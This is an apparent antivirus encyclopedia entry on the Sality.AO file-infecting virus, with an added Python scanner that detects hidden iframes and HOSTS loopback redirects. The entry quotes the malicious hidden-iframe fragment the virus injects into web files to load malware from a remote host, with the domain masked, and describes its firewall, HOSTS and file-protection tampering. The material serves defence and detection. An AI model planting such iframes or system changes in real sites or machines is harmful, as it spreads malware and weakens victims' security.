
Details of Virus Sality.AO

All details, description and effects of Sality.AO

Common names: Sality.AO
Type: VIRUS
Size: 8457 Bytes

DETECTIONS

Date first seen: February 12, 2009 at 00:00 AM

Brief Description

Sality.AO is a virus which infects executable files with an EXE and SCR extension that it finds on the affected computer.

Additionally, it infects web files with an ASP, HTM and PHP extension by inserting a hidden iframe that loads content from a remote host, which is used to download more malware to the affected computer.

Sality.AO infects executable files with an EXE and SCR extension, and files with an ASP, HTM and PHP extension. The infected files are then distributed through any of the usual means: floppy disks, email messages with attachments, Internet downloads, files transferred via FTP, IRC channels, P2P file-sharing networks, etc.

Effects

Sality.AO carries out the following actions:

  • It infects the following files:
    - files with an EXE and SCR extension.
    - files with an ASP, HTM and PHP extension, into which it inserts the following HTML fragment (an iframe tag; the domain is masked here):
    <iframe scr="http://xxxxxxx.pl/rc"width=1 height=2 style="border:0"></iframe>
    It adds this fragment to the ASP, HTM and PHP files it finds on the affected computer. Because the iframe is 1 by 2 pixels with no border, it is effectively invisible to anyone viewing the page; when a browser renders the page, the iframe silently loads content from the remote host, which the virus uses to download different types of malware to the affected computer.
  • It reduces the security level of the computer by adding itself to the list of applications authorized by Windows Firewall, so that its network traffic is not blocked.
  • It connects to an IRC channel and waits for remote instructions, such as downloading files or stealing information. It also modifies the HOSTS file, adding the following entry, which pins the listed domain to the loopback address (the domain is masked here):
    127.0.01 <blocked>F.pl
  • It disables Windows File Protection (WFP) and the check of protected files that runs when Windows starts:
    - Windows File Protection prevents critical Windows system files from being replaced. Programs must not overwrite these files, because the operating system and other programs depend on them.
    - The System File Checker tool checks whether the protected files have been modified and, if so, restores the original copies.
    With both features disabled, the protected Windows files can be modified, which can cause problems for the operating system and the installed programs.
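Two of the indicators listed above (the appended hidden iframe in ASP, HTM and PHP files, and the HOSTS entry that pins a domain to the loopback address) are easy to check for on a suspect machine or in a web root. The following scanner is an added example written for this entry, not Panda's detection logic or code from the virus; the sample web page and HOSTS file it runs on are constructed, and the domain names in them are placeholders. It looks for iframes that point at an external URL and are either tiny (both dimensions at or below a threshold) or styled invisible, accepting the `scr` spelling of the attribute as it appears in the fragment quoted above, and it flags any HOSTS line that maps a name other than localhost to 127.x or ::1, including sloppy forms such as `127.0.01`, which the resolver still reads as 127.0.0.1.

```python
import re

# Constructed sample inputs (not taken from an infected system): a web page with one
# ordinary iframe and one appended hidden iframe of the shape quoted in this entry,
# and a HOSTS file with one loopback redirect. Domain names are placeholders.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.example.org/widget" width=600 height=400></iframe>
</body></html>
<iframe scr="http://xxxxxxx.pl/rc"width=1 height=2 style="border:0"></iframe>"""

SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
127.0.01 xxxxxxxF.pl
"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# Attribute values may be double-quoted, single-quoted or bare. The quoted fragment
# has no space between the closing quote and "width"; this pattern still splits it.
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+)""")


def parse_attrs(raw):
    """Turn the inside of an iframe tag into a lower-cased attribute dict."""
    return {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(raw)}


def _dim(attrs, name):
    """Leading integer of a width/height attribute, or None if absent."""
    m = re.match(r"\d+", attrs.get(name, ""))
    return int(m.group()) if m else None


def find_hidden_iframes(content, max_px=10):
    """Return (target_url, attrs) for each iframe that points at an external URL
    and is tiny or styled invisible. 'scr' is accepted alongside 'src' because the
    fragment quoted in this entry spells it that way."""
    hits = []
    for m in IFRAME_RE.finditer(content):
        attrs = parse_attrs(m.group(1))
        target = attrs.get("src") or attrs.get("scr")
        if not target or not re.match(r"https?://", target, re.IGNORECASE):
            continue
        w, h = _dim(attrs, "width"), _dim(attrs, "height")
        tiny = w is not None and h is not None and w <= max_px and h <= max_px
        style = attrs.get("style", "").replace(" ", "").lower()
        invisible = "display:none" in style or "visibility:hidden" in style
        if tiny or invisible:
            hits.append((target, attrs))
    return hits


def is_loopback(addr):
    """Loopback in the forms a HOSTS file may carry: ::1, or any dotted form whose
    first octet is 127 (covers three-part forms like 127.0.01 that resolve to 127.0.0.1)."""
    if addr == "::1":
        return True
    parts = addr.split(".")
    return 2 <= len(parts) <= 4 and all(p.isdigit() for p in parts) and parts[0] == "127"


def loopback_redirects(hosts_text):
    """Return (line_number, hostname) for every non-localhost name pinned to loopback."""
    findings = []
    for lineno, line in enumerate(hosts_text.splitlines(), 1):
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        addr, *names = line.split()
        if not is_loopback(addr):
            continue
        for name in names:
            if name.lower() not in ("localhost", "localhost.localdomain", "broadcasthost"):
                findings.append((lineno, name))
    return findings


if __name__ == "__main__":
    for target, attrs in find_hidden_iframes(SAMPLE_HTML):
        print("hidden iframe ->", target, attrs)
    for lineno, name in loopback_redirects(SAMPLE_HOSTS):
        print("HOSTS line %d pins %s to loopback" % (lineno, name))
```

On a real system, feed `find_hidden_iframes` the contents of each ASP, HTM and PHP file under the web root and `loopback_redirects` the contents of %SystemRoot%\System32\drivers\etc\hosts; any hit is worth a closer look, since legitimate pages rarely embed 1-by-2-pixel borderless frames to external hosts and HOSTS normally maps only localhost to loopback. Treat a hit as an indicator to investigate, not proof of this specific variant.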

More information about virus Sality.AO in the Encyclopedia: http://www.pandasecurity.com/homeusers/security-info/about-malware/encyclopedia/overview.aspx?idvirus=